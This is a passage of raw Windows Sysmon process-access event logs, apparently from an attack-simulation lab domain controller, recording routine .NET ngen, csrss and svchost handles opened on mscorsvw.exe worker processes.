C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.621","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-0010C35D0E00}","TargetProcessId":"1820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7003,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.621\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-0010C35D0E00}\r\nTargetProcessId: 1820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.621","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-0010C35D0E00}","TargetProcessId":"1820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7004,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-0010C35D0E00}\r\nTargetProcessId: 1820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-0010C35D0E00}","TargetProcessId":"1820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7005,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.683\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-001048610E00}\r\nTargetProcessId: 1616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.683","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-001048610E00}","TargetProcessId":"1616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7006,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.683\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-001048610E00}\r\nTargetProcessId: 1616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.683","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-001048610E00}","TargetProcessId":"1616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7007,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.683\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-001048610E00}\r\nTargetProcessId: 1616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.683","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-001048610E00}","TargetProcessId":"1616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7008,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.699\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-001047640E00}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.699","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-001047640E00}","TargetProcessId":"4552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7009,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.699\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-001047640E00}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.699","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-001047640E00}","TargetProcessId":"4552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
